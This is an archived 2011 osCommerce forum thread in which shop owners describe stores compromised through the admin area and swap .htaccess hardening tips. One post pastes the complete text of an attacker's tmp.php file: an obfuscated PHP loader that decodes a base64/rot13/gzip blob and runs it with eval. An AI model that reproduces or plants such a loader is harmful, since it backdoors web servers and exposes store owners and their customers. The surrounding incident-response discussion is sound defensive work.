dsone Posted January 27, 2011 Share Posted January 27, 2011 i think the hacker came through the /admin/login.php exploit. I had installed OsCommerce 2.2 RC2, when this happend. I Updated now to 2.3.1, changed admin and DB password, now it looks good. I will let you know, if the hacker come again ;) Link to comment Share on other sites More sharing options...
Xpajun Posted January 27, 2011 Share Posted January 27, 2011 Hi everybody, This is indeed caused by OsCommerce. NO... it is not caused by osCommerce, is is caused because you have (or had) a lack of security on your version of osCommerce - and that applies to everyone that comes on to this forum crying that their store has been hacked. That statement may sound harsh but it is true, how many of you had back-ups of your store to put into place for if your store got hacked or your host dies? For those that have up graded to 2.3.1 how many have put in extra security and have a full clean back-up? Think about it... you have a store - it could be a plaything - it could be bringing in your lifestyle - it deserves to be protected the best you can do it... wouldn't you say? My store is currently running Phoenix 1.0.3.0 I'm currently working on 1.0.7.2 and hope to get it live before 1.0.8.0 arrives (maybe 🙄 ) I used to have a list of add-ons here but I've found that with the ones that supporters of Phoenix get any other add-ons are not really neccessary Link to comment Share on other sites More sharing options...
burt Posted January 27, 2011 Share Posted January 27, 2011 NO... it is not caused by osCommerce, is is caused because you have (or had) a lack of security on your version of osCommerce - and that applies to everyone that comes on to this forum crying that their store has been hacked. That statement may sound harsh but it is true, how many of you had back-ups of your store to put into place for if your store got hacked or your host dies? For those that have up graded to 2.3.1 how many have put in extra security and have a full clean back-up? Think about it... you have a store - it could be a plaything - it could be bringing in your lifestyle - it deserves to be protected the best you can do it... wouldn't you say? +1 You put it so much more eloquently than I could have. Link to comment Share on other sites More sharing options...
zododo Posted January 29, 2011 Share Posted January 29, 2011 osCommerce is vulnerable. I have couple of osCommerce sites been hacked recently. The latest one put .htaccess file into almost all folders, took me much time to clear. Could there be any body give hints where and how they break into the server. Link to comment Share on other sites More sharing options...
Guest Posted January 29, 2011 Share Posted January 29, 2011 CJ, Read the security forums. Chris Link to comment Share on other sites More sharing options...
Guest Posted February 2, 2011 Share Posted February 2, 2011 Hey guys, SAME THING TO ME. I have two stores (one with 2.3.1 and another with 2.2 RC2a) and in 25-01 at 1.25.00 AM appeared several .htaccess files... One of my stores got hacked, I cleaned it up completely, deleted .php files and everything... took me two full days to do it... Now, I have a problem trying to create xml Sitemap... anyone has the same issue?? I have 500 Internal server error with the xml bot. Thanks for your help! Link to comment Share on other sites More sharing options...
scoy Posted February 7, 2011 Share Posted February 7, 2011 Your .htaccess in your images folder should contain the following: # $Id$ # # This is used to restrict access to this folder to anything other # than images # Prevents any script files from being accessed from the images folder <FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$"> Order Deny,Allow Deny from all </FilesMatch> And nothing else, so if yours contains anything other than the above code delete it and replace it with the above Link to comment Share on other sites More sharing options...
scoy Posted February 7, 2011 Share Posted February 7, 2011 I have uploaded this script to my .htaccess file in my images directory, but I still have a hacker posting to my images directory. I remove the files almost daily. the are tmp.php mail.php read.php news.php class.php and other files I have removed all admins and renamed admin. I have checked all other directories, no other *.php files. I am at a loss of how they are posting to the images directory with I have the script posted in my .htaccess file. Is there any other thing I can do? Link to comment Share on other sites More sharing options...
germ Posted February 7, 2011 Share Posted February 7, 2011 You could put this .htaccess file in the images folder. It doesn't stop them from uploading crap, but the scripts won't run after they're uploaded so it doesn't matter a whole lot. Check the permissions on the images folder. They should NOT be higher than 755. You can find other tips at the link below: How to Secure Your Site If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
atelierbeads Posted February 7, 2011 Share Posted February 7, 2011 Well, I'm sure we'll all be delighted to learn that they're still out there. This happened to me on a BRAND NEW 2.2 installation--that is, WHILE I WAS SITTING HERE INSTALLING IT. Details I can provide are: 1) It happened sometime around noon, Eastern time today. 2) The tip-off was a "tmp.php" file in the main images directory, which was flagged 755. I will paste in the contents of that file. 3) It happened AFTER I did the basic OSC install but JUST BEFORE the .htaccess/.htpasswd files were uploaded. 4) I found an extra admin user. I found .htaccess files scattered around in several unexpected places. 5) A copy of my configure.php file was re-located from includes to the web root. I had already reset the permissions on this file. NONE of my existing osCommerce installs were impacted. All have had the various 2.2 security recommendations implemented. I can only conclude that they got this one because it was in progress. I have noted NO ISSUES with WordPress over the past two weeks, if anybody happens to have it. Will be checking more closely shortly. Hosting is through Rackspace Cloud, and they were unaware of any problems. I fixed that for them--they are now. :-) I think that's about it. Since this was a fresh install, and since I have all the files locally, it gave me the greatest pleasure just to blow the whole d#mned thing away. Lessons Learned: (1) Create the .htaccess and .htpasswd files BEFORE doing the install and upload them immediately thereafter when the install directory is deleted. (2) Continue to follow, rigorously, the security advice pinned to this forum. (3) When doing a new install, don't even get up to "p" until the site is locked down. I'm not going to talk about how much I want to kill this person. In six years, I've only had one other infiltration, and that was an XSS problem several years ago. Regards, Anne TEXT OF THE TMP.PHP FILE, FOUND IN THE IMAGES DIRECTORY <?php set_time_limit(0); error_reporting(0); $rhs="xZXBYYJAEEDvJv7D1otrQO41Mb00PfbSu8FoEBpgN+xFIKb/XrXYUu0BlmT2yBBrA2xsm1FeR+ZcJyLfQJ0orbw51MDni8VuOlYi7+Vn5c2rPXUWeC2fg2ALdtooTIhFL7nIggxpVhgoROilzPfMf3SBzuTfYCWhVa9Ux7ezAwMeCzb7FHe2+p5BIEhga7w8PtOTJxBrdiX9najyR4Q75oc90QjcJq+Zr1FMY+gJXSNgI9A8vvtm/RawAr69fvR7+238xw1n9Sss/nDejtGdUuNNuovHt2UYDWJcvn1pkM/DwQOctv5LaU+yw+8o25b66byI2eWu3io+7rK5YbiZRJa8WKXrbJdXX/UrOmjbu2PCwmqxNJ0f4TNPaVNrjVlqSv7xniMv4eAUsPSe8ix1lIasZg6cr1bPgJZV2P+W6KD9FzJs91swcvNbJETv7bzFVYydv4hxh40f5TPiAi7aPtxiwq7LQykdF6Up+3JP2WnDpKu7btL3vcOmLrxOEzbeQHYqYu0wT3esXVNyu3j9S7dESmPQeyvXH0f82xs/"; eval(gzinflate(str_rot13(base64_decode($rhs)))); ?> Link to comment Share on other sites More sharing options...
Guest Posted September 17, 2011 Share Posted September 17, 2011 Hi Guys, Interesting thread - whilst I'm not specifically an expert with os commerce, I am an expert in web application pentests. One recurring theme that can be seen throughout OSCommerce-related security posts and topics, is that the majority of attacks stem from the admin folder being publicly accessible. I'd suggest that, for those users with a static IP, you restrict access to the admin directory from only known administrative IP's - rather than rely on basic auth which is fundamentally flawed. You should be able to place the following code in a .htaccess file and upload to your admin folder to achieve this: <LIMIT GET> order allow,deny allow from xx.xx.xx.xx deny from all </LIMIT> Also, consider having regular security tests - even if it's not by ourselves. They're about as cheap as a night out and can save you from the chaos of being hacked. Link to comment Share on other sites More sharing options...
Guest Posted September 17, 2011 Share Posted September 17, 2011 <LIMIT GET> order allow,deny allow from xx.xx.xx.xx deny from all </LIMIT> This would limit store owners to accessing their sites from limited locations and those who use mobile devices that receive an IP on demand would not be able to access their site at all. Chris Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.